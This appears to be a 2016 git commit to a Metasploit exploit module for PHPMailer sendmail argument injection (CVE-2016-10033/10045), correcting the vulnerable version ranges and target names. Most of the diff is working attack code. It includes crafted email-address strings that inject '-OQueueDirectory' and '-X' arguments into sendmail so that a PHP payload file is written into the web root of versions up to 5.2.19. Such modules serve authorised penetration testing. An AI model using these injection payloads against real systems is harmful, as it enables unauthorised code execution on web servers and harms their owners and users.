Fix PHPMailer targets since 5.2.20 is not affected

zeroSteiner · zeroSteiner · commit cd90fd3b1cd4 · 2016-12-30T15:31:15.000-05:00
diff --git a/modules/exploits/multi/http/phpmailer_arg_injection.rb b/modules/exploits/multi/http/phpmailer_arg_injection.rb
@@ -15,7 +15,7 @@ def initialize(info = {})
     super(update_info(info,
       'Name'           => 'PHPMailer Sendmail Argument Injection',
       'Description'    => %q{
-        PHPMailer versions up to and including 5.2.20 are affected by a
+        PHPMailer versions up to and including 5.2.19 are affected by a
         vulnerability which can be leveraged by an attacker to write a file with
         partially controlled contents to an arbitrary location through injection
         of arguments that are passed to the sendmail binary. This module
@@ -31,6 +31,8 @@ def initialize(info = {})
       'License'        => MSF_LICENSE,
       'References'     => [
         ['CVE', '2016-10033'],
+        ['CVE', '2016-10045'],
+        ['EDB', '40968'],
         ['EDB', '40969'],
         ['URL', 'https://github.com/opsxcq/exploit-CVE-2016-10033'],
         ['URL', 'https://legalhackers.com/advisories/PHPMailer-Exploit-Remote-Code-Exec-CVE-2016-10033-Vuln.html']
@@ -40,8 +42,8 @@ def initialize(info = {})
       'Arch'           => ARCH_PHP,
       'Payload'        => {'DisableNops' => true},
       'Targets'        => [
-        ['PHPMailer <=5.2.18', {}],
-        ['PHPMailer 5.2.20', {}]
+        ['PHPMailer <5.2.18', {}],
+        ['PHPMailer 5.2.18 - 5.2.19', {}]
       ],
       'DefaultTarget'  => 0
     ))
@@ -95,10 +97,10 @@ def exploit
     payload_file_name = "#{rand_text_alphanumeric(8)}.php"
     payload_file_path = "#{datastore['WEB_ROOT']}/#{payload_file_name}"
 
-    if target.name == 'PHPMailer <=5.2.18'
+    if target.name == 'PHPMailer <5.2.18'
       email = "\"#{rand_text_alphanumeric(4 + rand(8))}\\\" -OQueueDirectory=/tmp -X#{payload_file_path} #{rand_text_alphanumeric(4 + rand(8))}\"@#{rand_text_alphanumeric(4 + rand(8))}.com"
-    elsif target.name == 'PHPMailer 5.2.20'
-      email = "\\\"#{rand_text_alphanumeric(4 + rand(8))}\\' -OQueueDirectory=/tmp -X#{payload_file_path} #{rand_text_alphanumeric(4 + rand(8))}\\\"@#{rand_text_alphanumeric(4 + rand(8))}.com"
+    elsif target.name == 'PHPMailer 5.2.18 - 5.2.19'
+      email = "\"#{rand_text_alphanumeric(4 + rand(8))}\\' -OQueueDirectory=/tmp -X#{payload_file_path} #{rand_text_alphanumeric(4 + rand(8))}\"@#{rand_text_alphanumeric(4 + rand(8))}.com"
     else
       fail_with(Failure::NoTarget, 'The specified version is not supported')
     end
